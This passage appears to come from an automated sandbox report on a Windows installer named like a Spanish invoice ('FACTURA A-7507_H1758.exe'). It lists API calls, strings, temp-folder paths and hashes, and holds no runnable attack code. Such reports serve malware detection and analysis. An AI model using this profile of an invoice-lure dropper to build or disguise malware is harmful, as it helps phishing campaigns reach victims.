                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA6
                                                                                                                                                                                                                          • SetFilePointer.KERNEL32(0040A588,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A588,00000000,[Rename],00000000,00000000,00000000), ref: 00405FFC
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 0040600D
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406014
                                                                                                                                                                                                                            • Part of subcall function 00405D53: GetFileAttributesW.KERNELBASE(00000003,00402E84,C:\Users\user\Desktop\FACTURA A-7507_H1758.exe,80000000,00000003), ref: 00405D57
                                                                                                                                                                                                                            • Part of subcall function 00405D53: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405D79
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                                                                                                                                                          • String ID: %ls=%ls$NUL$[Rename]
                                                                                                                                                                                                                          • API String ID: 222337774-899692902
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CharNextW.USER32(?,*?|<>/":,00000000,00000000,77233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FACTURA A-7507_H1758.exe",00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 00406475
                                                                                                                                                                                                                          • CharNextW.USER32(?,?,?,00000000), ref: 00406484
                                                                                                                                                                                                                          • CharNextW.USER32(?,00000000,77233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FACTURA A-7507_H1758.exe",00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 00406489
                                                                                                                                                                                                                          • CharPrevW.USER32(?,?,77233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FACTURA A-7507_H1758.exe",00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 0040649C
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • *?|<>/":, xrefs: 00406464
                                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00406413
                                                                                                                                                                                                                          • "C:\Users\user\Desktop\FACTURA A-7507_H1758.exe", xrefs: 00406412
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Char$Next$Prev
                                                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\FACTURA A-7507_H1758.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                          • API String ID: 589700163-490790066
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000EB), ref: 004042C6
                                                                                                                                                                                                                          • GetSysColor.USER32(00000000), ref: 004042E2
                                                                                                                                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 004042EE
                                                                                                                                                                                                                          • SetBkMode.GDI32(?,?), ref: 004042FA
                                                                                                                                                                                                                          • GetSysColor.USER32(?), ref: 0040430D
                                                                                                                                                                                                                          • SetBkColor.GDI32(?,?), ref: 0040431D
                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00404337
                                                                                                                                                                                                                          • CreateBrushIndirect.GDI32(?), ref: 00404341
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2320649405-0
                                                                                                                                                                                                                          • Opcode ID: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
                                                                                                                                                                                                                          • Instruction ID: 2a82f640caf94e13ad52f77eccc7f6a005bf570db5d4005cc44859485eb84fad
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F215171600704ABCB219F68DE08B4BBBF8AF81714F04892DED95E26A0D738E904CB64
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 00405315
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(00402E19,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 00405325
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(00422708,00402E19,00402E19,00422708,00000000,00000000,00000000), ref: 00405338
                                                                                                                                                                                                                          • SetWindowTextW.USER32(00422708,00422708), ref: 0040534A
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405370
                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538A
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405398
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2531174081-0
                                                                                                                                                                                                                          • Opcode ID: e0d278b4f454602652d1392a5fb3045d02927be56822f9b38c604404e895085a
                                                                                                                                                                                                                          • Instruction ID: d14990956ab1253184f877e9e8298894284f42a30aea32824f5004b5108fa95f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e0d278b4f454602652d1392a5fb3045d02927be56822f9b38c604404e895085a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 62217F71900518BACF119FA6DD44ACFBFB8EF85354F10807AF904B62A1C7B94A51DFA8
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • DestroyWindow.USER32(00000000,00000000), ref: 00402DBA
                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00402DD8
                                                                                                                                                                                                                          • wsprintfW.USER32 ref: 00402E06
                                                                                                                                                                                                                            • Part of subcall function 004052DD: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 00405315
                                                                                                                                                                                                                            • Part of subcall function 004052DD: lstrlenW.KERNEL32(00402E19,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 00405325
                                                                                                                                                                                                                            • Part of subcall function 004052DD: lstrcatW.KERNEL32(00422708,00402E19,00402E19,00422708,00000000,00000000,00000000), ref: 00405338
                                                                                                                                                                                                                            • Part of subcall function 004052DD: SetWindowTextW.USER32(00422708,00422708), ref: 0040534A
                                                                                                                                                                                                                            • Part of subcall function 004052DD: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405370
                                                                                                                                                                                                                            • Part of subcall function 004052DD: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538A
                                                                                                                                                                                                                            • Part of subcall function 004052DD: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405398
                                                                                                                                                                                                                          • CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402E2A
                                                                                                                                                                                                                          • ShowWindow.USER32(00000000,00000005), ref: 00402E38
                                                                                                                                                                                                                            • Part of subcall function 00402D83: MulDiv.KERNEL32(00000000,00000064,0000046D), ref: 00402D98
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                                                                                                                                          • String ID: ... %d%%
                                                                                                                                                                                                                          • API String ID: 722711167-2449383134
                                                                                                                                                                                                                          • Opcode ID: 8ee64202bb889ad073ab03690c1da717cfa73e4708a38b32ca01aecf011a85b8
                                                                                                                                                                                                                          • Instruction ID: 67f39cb704aca6262626a7976268bb3bb8a333bdab68892006d91dd8afb4411f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ee64202bb889ad073ab03690c1da717cfa73e4708a38b32ca01aecf011a85b8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 96016D70541614EBC721AB60EF4DA9B7A68AF00706B14417FF885F12E0CBF85865CBEE
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BC2
                                                                                                                                                                                                                          • GetMessagePos.USER32 ref: 00404BCA
                                                                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 00404BE4
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404BF6
                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C1C
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                          • String ID: f
                                                                                                                                                                                                                          • API String ID: 41195575-1993550816
                                                                                                                                                                                                                          • Opcode ID: 0086211f2de0e1ca33d279ef662edcfa4b2f35d2ca496e99dd6aa4820b9c6f7a
                                                                                                                                                                                                                          • Instruction ID: 45e0f6331f39cfe7836e80c9775163861a3897288b26a0b158bc224782e9bc0b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0086211f2de0e1ca33d279ef662edcfa4b2f35d2ca496e99dd6aa4820b9c6f7a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C9015271901218BAEB00DB94DD45FFEBBBCAF54711F10012BBA51B61D0C7B495018B54
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402D22
                                                                                                                                                                                                                          • wsprintfW.USER32 ref: 00402D56
                                                                                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 00402D66
                                                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D78
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                          • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                                                                                                                                          • API String ID: 1451636040-1158693248
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 10002416
                                                                                                                                                                                                                            • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26345910476.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26345861444.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26345958604.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26346002793.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4216380887-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 10002572
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 100025AD
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26345910476.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26345861444.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26345958604.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26346002793.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Global$Free$Alloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1780285237-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 004028E9
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 004028FC
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00402914
                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2667972263-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B3A
                                                                                                                                                                                                                          • wsprintfW.USER32 ref: 00404B43
                                                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00423728), ref: 00404B56
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                          • String ID: %u.%u%s%s$(7B
                                                                                                                                                                                                                          • API String ID: 3540041739-1320723960
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsrFDBF.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsrFDBF.tmp\System.dll,00000400,?,?,00000021), ref: 00402583
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsrFDBF.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsrFDBF.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsrFDBF.tmp\System.dll,00000400,?,?,00000021), ref: 0040258E
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharMultiWidelstrlen
                                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsrFDBF.tmp$C:\Users\user\AppData\Local\Temp\nsrFDBF.tmp\System.dll
                                                                                                                                                                                                                          • API String ID: 3109718747-717743250
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402C20
                                                                                                                                                                                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402C65
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                                                                                                                                                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1912718029-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26345910476.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1148316912-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00401D00
                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 00401D0D
                                                                                                                                                                                                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00401D4B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1849352358-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetDC.USER32(?), ref: 00401D59
                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
                                                                                                                                                                                                                          • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
                                                                                                                                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 00401D86
                                                                                                                                                                                                                          • CreateFontIndirectW.GDI32(0040CDE0), ref: 00401DD1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3808545654-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$Timeout
                                                                                                                                                                                                                          • String ID: !
                                                                                                                                                                                                                          • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0040617E: lstrcpynW.KERNEL32(?,?,00000400,00403463,00429240,NSIS Error), ref: 0040618B
                                                                                                                                                                                                                            • Part of subcall function 00405BDD: CharNextW.USER32(?,?,00425F30,?,00405C51,00425F30,00425F30, 4#w.#w,?,77232EE0,0040598F,?,77233420,77232EE0,00000000), ref: 00405BEB
                                                                                                                                                                                                                            • Part of subcall function 00405BDD: CharNextW.USER32(00000000), ref: 00405BF0
                                                                                                                                                                                                                            • Part of subcall function 00405BDD: CharNextW.USER32(00000000), ref: 00405C08
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30, 4#w.#w,?,77232EE0,0040598F,?,77233420,77232EE0,00000000), ref: 00405C93
                                                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30, 4#w.#w,?,77232EE0,0040598F,?,77233420,77232EE0), ref: 00405CA3
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                                                                                          • String ID: 4#w.#w$0_B
                                                                                                                                                                                                                          • API String ID: 3248276644-2230118208
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000002,Call,?,004062BE,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00406075
                                                                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,004062BE,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00406096
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,004062BE,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 004060B9
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                          • String ID: Call
                                                                                                                                                                                                                          • API String ID: 3677997916-1824292864
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004033A3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 00405B38
                                                                                                                                                                                                                          • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004033A3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 00405B42
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,0040A014), ref: 00405B54
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B32
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(000002BC,C:\Users\user\AppData\Local\Temp\,00403708,?), ref: 004038E7
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(000002CC,C:\Users\user\AppData\Local\Temp\,00403708,?), ref: 004038FB
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\nsrFDBF.tmp, xrefs: 0040390B
                                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004038DA
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsrFDBF.tmp
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetWindowTextW.USER32(00000000,00429240), ref: 00403D35
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: TextWindow
                                                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\FACTURA A-7507_H1758.exe"$1033
                                                                                                                                                                                                                          APIs
